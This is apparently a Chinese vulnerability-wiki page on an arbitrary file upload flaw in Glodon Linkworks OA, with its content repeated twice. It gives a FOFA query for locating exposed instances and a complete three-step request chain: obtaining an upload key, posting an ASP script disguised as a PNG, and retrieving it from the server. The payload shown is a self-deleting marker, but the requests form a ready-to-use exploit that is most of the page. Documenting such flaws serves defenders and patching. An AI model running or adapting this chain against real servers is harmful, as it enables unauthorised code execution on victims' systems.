fofamini-wiki

登录白背景

源码

广联达OA UserFilesUpload存在任意文件上传漏洞

一、漏洞简介

广联达Linkworks办公OA（Office Automation）是一款综合办公自动化解决方案，旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具，帮助企业管理和处理日常办公任务、流程和文档。广联达OA UserFilesUpload存在任意文件上传漏洞

二、影响版本

广联达办公OA

三、资产测绘

app.name="广联达 OA"
登录页面

四、漏洞复现

创建文件，获取key

POST /Services/FileService/UserFiles/GetAuthorizeKey.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Connection: close
Content-Length: 41
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
SL-CE-SUID: 97

destDir=./sysinfo/&destFilename=rtiko.asp

通过上一步获取的key，构造请求数据包上传文件

POST /Services/FileService/UserFiles/UserFilesUpload.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Connection: close
Content-Length: 782
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----ehjqlfi2qaa6kb5c4xri
SL-CE-SUID: 97

------ehjqlfi2qaa6kb5c4xri
Content-Disposition: form-data; name="destDir"

./sysinfo/
------ehjqlfi2qaa6kb5c4xri
Content-Disposition: form-data; name="destFilename"

rtiko.asp
------ehjqlfi2qaa6kb5c4xri
Content-Disposition: form-data; name="key"

1ca6d666-927d-4974-9a75-10f093e4e1fb
------ehjqlfi2qaa6kb5c4xri
Content-Disposition: form-data; name="successUrl"

~\sysinfo
------ehjqlfi2qaa6kb5c4xri
Content-Disposition: form-data; name="overWrite"

true
------ehjqlfi2qaa6kb5c4xri
Content-Disposition: form-data; name="FileData"; filename="rtiko.asp"
Content-Type: image/png

<% response.write("drwc2nymcirgr7r2bdgb")
set myfso=server.CreateObject("scripting.filesystemobject") 
myfso.DeleteFile(Server.MapPath("rtiko.asp"))%>
------ehjqlfi2qaa6kb5c4xri--

上传文件位置

GET /UserFiles/sysinfo/rtiko.asp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate

原文: https://www.yuque.com/xiaokp7/ocvun2/vqhpdf67qynnuyfg

# 广联达OA UserFilesUpload存在任意文件上传漏洞

# 一、漏洞简介
广联达Linkworks办公OA（Office Automation）是一款综合办公自动化解决方案，旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具，帮助企业管理和处理日常办公任务、流程和文档。广联达OA UserFilesUpload存在任意文件上传漏洞

# 二、影响版本

- 广联达办公OA

# 三、资产测绘

- app.name="广联达 OA"
- 登录页面

![image.png](./img/BE57iWJIC7Q_qa9v/1693579287118-af540618-cbfd-44d4-82b6-cf9792772477-628699.png)

# 四、漏洞复现

1. 创建文件，获取`key`
```java
POST /Services/FileService/UserFiles/GetAuthorizeKey.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Connection: close
Content-Length: 41
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
SL-CE-SUID: 97

destDir=./sysinfo/&destFilename=rtiko.asp
```
![image.png](./img/BE57iWJIC7Q_qa9v/1704872840346-24521ad7-c04a-4c4b-93d0-f6b7259d98ba-913756.png)

2. 通过上一步获取的`key`，构造请求数据包上传文件
```java
POST /Services/FileService/UserFiles/UserFilesUpload.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Connection: close
Content-Length: 782
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----ehjqlfi2qaa6kb5c4xri
SL-CE-SUID: 97

------ehjqlfi2qaa6kb5c4xri
Content-Disposition: form-data; name="destDir"

./sysinfo/
------ehjqlfi2qaa6kb5c4xri
Content-Disposition: form-data; name="destFilename"

rtiko.asp
------ehjqlfi2qaa6kb5c4xri
Content-Disposition: form-data; name="key"

1ca6d666-927d-4974-9a75-10f093e4e1fb
------ehjqlfi2qaa6kb5c4xri
Content-Disposition: form-data; name="successUrl"

~\sysinfo
------ehjqlfi2qaa6kb5c4xri
Content-Disposition: form-data; name="overWrite"

true
------ehjqlfi2qaa6kb5c4xri
Content-Disposition: form-data; name="FileData"; filename="rtiko.asp"
Content-Type: image/png

<% response.write("drwc2nymcirgr7r2bdgb")
set myfso=server.CreateObject("scripting.filesystemobject") 
myfso.DeleteFile(Server.MapPath("rtiko.asp"))%>
------ehjqlfi2qaa6kb5c4xri--
```
![image.png](./img/BE57iWJIC7Q_qa9v/1704872934608-e533fa9d-c727-457e-8157-a6bc046ecbd1-861643.png)

3. 上传文件位置
```java
GET /UserFiles/sysinfo/rtiko.asp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
```
![image.png](./img/BE57iWJIC7Q_qa9v/1704872979692-cbfe370e-7992-446a-a050-eb12a5810747-908181.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vqhpdf67qynnuyfg>